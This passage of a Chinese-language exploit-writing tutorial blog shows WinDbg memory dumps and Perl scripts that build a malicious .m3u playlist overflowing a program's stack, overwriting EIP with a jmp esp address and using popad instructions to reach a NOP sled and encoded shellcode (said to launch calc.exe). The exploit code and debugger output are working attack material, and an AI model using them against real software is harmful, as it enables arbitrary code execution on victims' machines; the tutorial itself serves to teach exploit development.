000ffd88  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD
000ffd98  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD
000ffda8  44 00 43 43 43 43 43 43-43 43 43 43 43 43 43 43  D.CCCCCCCCCCCCCC
0:000&gt; d
000ffdb8  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
000ffdc8  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
000ffdd8  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
000ffde8  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
000ffdf8  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
000ffe08  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
000ffe18  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
000ffe28  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
0:000&gt; d
000ffe38  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
000ffe48  43 43 90 90 90 90 90 90-90 90 90 90 90 90 90 90  CC..............
000ffe58  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffe68  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffe78  90 90 90 90 cc 41 41 41-41 41 41 41 41 41 41 41  .....AAAAAAAAAAA
000ffe88  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffe98  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffea8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0:000&gt; d
000ffeb8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffec8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffed8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
</code></pre>
<p>也就是说，我们要从 ESP 处的 13 字节 “X” 开始，跳过 100 字节的 “D” 和紧随其后的 160 字节 “C”（连同中间的一个 00 字节，从 ESP 到 NOP 起始地址 0x000ffe4a 共 0x112 = 274 字节），才能到达末尾的 shellcode（以 NOP 开头，接一个 0xcc，然后是代表 shellcode 其余部分的 A’s）。一条 popad 相当于从栈中弹出 32 字节，9 条 popad 共前移 288 字节，比 274 多出 14 字节，正好落在 shellcode 前面的 NOP 串里——换句话说，shellcode 入口前至少要留出这么多 NOP。既然 NOP 已经就位，现在可以尝试用 “popad” 进入 NOP 区，然后看程序是否能够中断在断点处。</p>
<p>调整一下脚本：仍用之前找到的 jmp esp 地址覆盖 EIP，EIP 之后先保留 4 个 X（这 4 个字节不在 ESP 处），然后用 9 个 popad（0x61）替代之前的 X’s，再接上 0xff 0xe4（jmp esp）。</p>
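<pre><code class="perl">use strict;
use warnings;
# test2.m3u: 9 x popad at ESP (9 * 32 = 288 bytes) followed by jmp esp should
# land in the NOP sled in front of the int3 marker.
my $file = "test2.m3u";
my $buffersize = 26067;
my $junk = "C" x 250;
my $nop  = "\x90" x 50;
my $shellcode = "\xcc";   # int3 marker
my $restofbuffer = "A" x ($buffersize-(length($junk)+length($nop)+length($shellcode)));
my $eip = pack('V', 0x01b9f23a);   # jmp esp address found earlier (little-endian)
# NOTE: the original listing had "X" * 4 - numeric multiplication, which
# evaluates to the one-byte string "0" (use warnings flags it) and shifts the
# whole layout by 3 bytes. "x" is the string repetition operator we want.
my $preshellcode = "X" x 4;        # ESP points 4 bytes past EIP, so these 4 bytes are skipped
$preshellcode .= "\x61" x 9;       # 9 x popad
$preshellcode .= "\xff\xe4";       # jmp esp
$preshellcode .= "\x90" x 3;
# let's pretend this is the only space we have available
my $garbage = "D" x 100;   # let's pretend this is the space we need to jump over
my $buffer = $junk.$nop.$shellcode.$restofbuffer;
print "Size of buffer : ".length($buffer)."\n";
open(my $FILE, '&gt;', $file) or die "Cannot open $file: $!\n";
binmode($FILE);   # raw bytes: no newline translation on Windows
print $FILE $buffer.$eip.$preshellcode.$garbage;
close($FILE) or die "Cannot close $file: $!\n";
</code></pre>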
<p>打开文件后断在了我们设置的 int3 断点处。查看一下当前 EIP 和 ESP 的情况。注意下面的 esp=000ffdf8 = 000ffd38 + 6 * 32，说明生成这份转储时实际上只执行了 6 条 popad 而不是 9 条：当时脚本里写的是 <code>"X" * 4</code>（Perl 的数值乘法，结果是单字节字符串 “0”）而不是重复运算符 <code>"X" x 4</code>，整段布局因此前移了 3 字节，ESP 指向的是第 4 条 popad。随后的 jmp esp 落在了由 “C”（0x43，即 <code>inc ebx</code>）组成的区域，这些字节恰好是无害的单字节指令，一路执行到 NOP 串后再滑入 0xcc——ebx=43434395 正是 43434343 加上 0x52 条 inc ebx 的结果。能成功纯属运气：脚本中应写成 <code>"X" x 4</code>，这样 9 条 popad 才会按预期把 ESP 推到 0x000ffe58 的 NOP 区。</p>
<pre><code>eax=43434343 ebx=43434395 ecx=43434343 edx=43434343 esi=43434343 edi=43434343
eip=000ffe7c esp=000ffdf8 ebp=43434343 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
000ffe7c cc              int     3
0:000&gt; d eip
000ffe7c  cc 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  .AAAAAAAAAAAAAAA
000ffe8c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffe9c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffeac  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffebc  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffecc  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffedc  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffeec  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0:000&gt; d eip-32
000ffe4a  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffe5a  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffe6a  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffe7a  90 90 cc 41 41 41 41 41-41 41 41 41 41 41 41 41  ...AAAAAAAAAAAAA
000ffe8a  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffe9a  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffeaa  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffeba  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0:000&gt; d esp
000ffdf8  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
000ffe08  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
000ffe18  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
000ffe28  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
000ffe38  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
000ffe48  43 43 90 90 90 90 90 90-90 90 90 90 90 90 90 90  CC..............
000ffe58  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
000ffe68  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
0:000&gt; d
000ffe78  90 90 90 90 cc 41 41 41-41 41 41 41 41 41 41 41  .....AAAAAAAAAAA
000ffe88  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffe98  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffea8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffeb8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffec8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffed8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
000ffee8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
</code></pre>
<p>接下来可以使用真正的shellcode来替换掉”0xcc”</p>
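<pre><code class="perl">use strict;
use warnings;
# test3.m3u: same layout as test2, with the int3 marker replaced by the real payload.
my $file = "test3.m3u";
my $buffersize = 26067;
my $junk = "C" x 250;
my $nop  = "\x90" x 50;
# calc.exe payload used by the article; bytes kept verbatim
my $shellcode = "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca";
my $restofbuffer = "A" x ($buffersize-(length($junk)+length($nop)+length($shellcode)));
my $eip = pack('V', 0x01b9f23a);   # jmp esp address found earlier (little-endian)
# NOTE: the original listing had "X" * 4 (numeric multiply -> the one-byte
# string "0"); "x" is the string repetition operator we want.
my $preshellcode = "X" x 4;        # ESP points 4 bytes past EIP, so these 4 bytes are skipped
$preshellcode .= "\x61" x 9;       # 9 x popad
$preshellcode .= "\xff\xe4";       # jmp esp
$preshellcode .= "\x90" x 3;
# let's pretend this is the only space we have available
my $garbage = "D" x 100;   # let's pretend this is the space we need to jump over
my $buffer = $junk.$nop.$shellcode.$restofbuffer;
print "Size of buffer : ".length($buffer)."\n";
open(my $FILE, '&gt;', $file) or die "Cannot open $file: $!\n";
binmode($FILE);   # raw bytes: a text-mode handle on Windows would rewrite 0x0a as 0x0d 0x0a
print $FILE $buffer.$eip.$preshellcode.$garbage;
close($FILE) or die "Cannot close $file: $!\n";
</code></pre>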
<img lazyload="" src="/images/loading.svg" data-src="/2021/05/20/exploit%E7%BC%96%E5%86%99%E7%B3%BB%E5%88%972%EF%BC%9A%E6%A0%88%E6%BA%A2%E5%87%BA%EF%BC%8C%E8%B7%B3%E8%BD%AC%E8%87%B3shellcode/image-20210206000619469-1621477705987.png" class="" title="image-20210206000619469">

<p>shellcode执行成功</p>

		</div>

		
		<div class="post-copyright-info w-full my-8 px-2 sm:px-6 md:px-8">
			<div class="article-copyright-info-container">
    <ul>
        <li><strong>标题:</strong> exploit编写系列2：栈溢出，跳转至shellcode</li>
        <li><strong>作者:</strong> xiaoeryu</li>
        <li><strong>创建于
                :</strong> 2021-05-20 10:27:25</li>
        
            <li>
                <strong>更新于
                    :</strong> 2023-11-17 19:36:43
            </li>
        
        <li>
            <strong>链接:</strong> https://github.com/xiaoeryu/2021/05/20/exploit编写系列2：栈溢出，跳转至shellcode/
        </li>
        <li>
            <strong>
                版权声明:
            </strong>
            

            
                本文章采用 <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0">CC BY-NC-SA 4.0</a> 进行许可。
            
        </li>
    </ul>
</div>

		</div>
		

		
		<ul class="post-tags-box text-lg mt-1.5 flex-wrap justify-center flex md:hidden">
			
			<li class="tag-item mx-0.5">
				<a href="/tags/exploit%E7%BC%96%E5%86%99/">#exploit编写</a>&nbsp;
			</li>
			
			<li class="tag-item mx-0.5">
				<a href="/tags/%E6%BA%A2%E5%87%BA%E7%B1%BB%E5%9E%8B%E6%BC%8F%E6%B4%9E/">#溢出类型漏洞</a>&nbsp;
			</li>
			
		</ul>
		

		

		
		


		
		
	</div>

	
	
</div>
			</div>

			
		</div>

		<div class="main-content-footer">
			<footer class="footer mt-5 py-5 h-auto text-base text-third-text-color relative border-t-2 border-t-border-color">
    <div class="info-container py-3 text-center">
        
        <div class="text-center">
            &copy;
            
              <span>2022</span>
              -
            
            2025&nbsp;&nbsp;<i class="fa-solid fa-heart fa-beat" style="--fa-animation-duration: 0.5s; color: #f54545"></i>&nbsp;&nbsp;<a href="/">xiaoeryu</a>
            
                
                <p class="post-count space-x-0.5">
                    <span>
                        共撰写了 112 篇文章
                    </span>
                    
                </p>
            
        </div>
        
            <script data-swup-reload-script src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
            <div class="relative text-center lg:absolute lg:right-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-right">
                
                    <span id="busuanzi_container_site_uv" class="lg:!block">
                        <span class="text-sm">访问人数</span>
                        <span id="busuanzi_value_site_uv"></span>
                    </span>
                
                
                    <span id="busuanzi_container_site_pv" class="lg:!block">
                        <span class="text-sm">总访问量</span>
                        <span id="busuanzi_value_site_pv"></span>
                    </span>
                
            </div>
        
        <div class="relative text-center lg:absolute lg:left-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-left">
            <span class="lg:block text-sm">由 <?xml version="1.0" encoding="utf-8"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg class="relative top-[2px] inline-block align-baseline" version="1.1" id="圖層_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1rem" height="1rem" viewBox="0 0 512 512" enable-background="new 0 0 512 512" xml:space="preserve"><path fill="#0E83CD" d="M256.4,25.8l-200,115.5L56,371.5l199.6,114.7l200-115.5l0.4-230.2L256.4,25.8z M349,354.6l-18.4,10.7l-18.6-11V275H200v79.6l-18.4,10.7l-18.6-11v-197l18.5-10.6l18.5,10.8V237h112v-79.6l18.5-10.6l18.5,10.8V354.6z"/></svg><a target="_blank" class="text-base" href="https://hexo.io">Hexo</a> 驱动</span>
            <span class="text-sm lg:block">主题&nbsp;<a class="text-base" target="_blank" href="https://github.com/EvanNotFound/hexo-theme-redefine">Redefine v2.8.2</a></span>
        </div>
        
        
        
        
            <script data-swup-reload-script>
                try {
                    function odometer_init() {
                    const elements = document.querySelectorAll('.odometer');
                    elements.forEach(el => {
                        new Odometer({
                            el,
                            format: '( ddd).dd',
                            duration: 200
                        });
                    });
                    }
                    odometer_init();
                } catch (error) {}
            </script>
        
        
        
    </div>  
</footer>
		</div>
	</div>

	
	<div class="post-tools">
		<div class="post-tools-container">
	<ul class="article-tools-list">
		<!-- TOC aside toggle -->
		
		<li class="right-bottom-tools page-aside-toggle">
			<i class="fa-regular fa-outdent"></i>
		</li>
		

		<!-- go comment -->
		
		<li class="go-comment">
			<i class="fa-regular fa-comments"></i>
		</li>
		
	</ul>
</div>
	</div>
	

	<div class="right-side-tools-container">
		<div class="side-tools-container">
	<ul class="hidden-tools-list">
		<li class="right-bottom-tools tool-font-adjust-plus flex justify-center items-center">
			<i class="fa-regular fa-magnifying-glass-plus"></i>
		</li>

		<li class="right-bottom-tools tool-font-adjust-minus flex justify-center items-center">
			<i class="fa-regular fa-magnifying-glass-minus"></i>
		</li>

		<li class="right-bottom-tools tool-dark-light-toggle flex justify-center items-center">
			<i class="fa-regular fa-moon"></i>
		</li>

		<!-- rss -->
		

		

		<li class="right-bottom-tools tool-scroll-to-bottom flex justify-center items-center">
			<i class="fa-regular fa-arrow-down"></i>
		</li>
	</ul>

	<ul class="visible-tools-list">
		<li class="right-bottom-tools toggle-tools-list flex justify-center items-center">
			<i class="fa-regular fa-cog fa-spin"></i>
		</li>
		
		<li class="right-bottom-tools tool-scroll-to-top flex justify-center items-center">
			<i class="arrow-up fas fa-arrow-up"></i>
			<span class="percent"></span>
		</li>
		
		
	</ul>
</div>
	</div>

	<div class="image-viewer-container">
	<img src="">
</div>

	
	<div class="search-pop-overlay">
	<div class="popup search-popup">
		<div class="search-header">
			<span class="search-input-field-pre">
				<i class="fa-solid fa-keyboard"></i>
			</span>
			<div class="search-input-container">
				<input autocomplete="off" autocorrect="off" autocapitalize="off" placeholder="站内搜索您需要的内容..." spellcheck="false" type="search" class="search-input">
			</div>
			<span class="popup-btn-close">
				<i class="fa-solid fa-times"></i>
			</span>
		</div>
		<div id="search-result">
			<div id="no-result">
				<i class="fa-solid fa-spinner fa-spin-pulse fa-5x fa-fw"></i>
			</div>
		</div>
	</div>
</div>
	

</main>



<script src="/js/build/libs/Swup.min.js"></script>

<script src="/js/build/libs/SwupSlideTheme.min.js"></script>

<script src="/js/build/libs/SwupScriptsPlugin.min.js"></script>

<script src="/js/build/libs/SwupProgressPlugin.min.js"></script>

<script src="/js/build/libs/SwupScrollPlugin.min.js"></script>

<script src="/js/build/libs/SwupPreloadPlugin.min.js"></script>

<script>
    // Swup drives the client-side page transitions for this theme; `swup` is
    // left as a script-level binding, as before, so other scripts can reach it.
    const swup = new Swup({
        // The single element whose content is swapped on navigation.
        containers: ["#swup"],
        // Plugin order is kept exactly as originally configured.
        plugins: [
            // optin: only scripts carrying data-swup-reload-script are re-run
            // after a transition (the inline footer scripts rely on this).
            new SwupScriptsPlugin({ optin: true }),
            new SwupProgressPlugin(),
            // offset: presumably the fixed navbar height so anchor targets land
            // below it — confirm against the theme's CSS.
            new SwupScrollPlugin({ offset: 80 }),
            new SwupSlideTheme({ mainElement: ".main-content-body" }),
            new SwupPreloadPlugin(),
        ],
    });
</script>




	
<script src="/js/build/tools/imageViewer.js" type="module"></script>

<script src="/js/build/utils.js" type="module"></script>

<script src="/js/build/main.js" type="module"></script>

<script src="/js/build/layouts/navbarShrink.js" type="module"></script>

<script src="/js/build/tools/scrollTopBottom.js" type="module"></script>

<script src="/js/build/tools/lightDarkSwitch.js" type="module"></script>

<script src="/js/build/layouts/categoryList.js" type="module"></script>



    
<script src="/js/build/tools/localSearch.js" type="module"></script>




    
<script src="/js/build/tools/codeBlock.js" type="module"></script>




    
<script src="/js/build/layouts/lazyload.js" type="module"></script>




    
<script src="/js/build/tools/runtime.js"></script>

    
<script src="/js/build/libs/odometer.min.js"></script>

    
<link rel="stylesheet" href="/assets/odometer-theme-minimal.css">




  
<script src="/js/build/libs/Typed.min.js"></script>

  
<script src="/js/build/plugins/typed.js" type="module"></script>








    
<script src="/js/build/libs/anime.min.js"></script>





    
<script src="/js/build/tools/tocToggle.js" type="module" data-swup-reload-script=""></script>

<script src="/js/build/layouts/toc.js" type="module" data-swup-reload-script=""></script>

<script src="/js/build/plugins/tabs.js" type="module" data-swup-reload-script=""></script>




<script src="/js/build/libs/moment-with-locales.min.js" data-swup-reload-script=""></script>


<script src="/js/build/layouts/essays.js" type="module" data-swup-reload-script=""></script>





	
</body>

</html>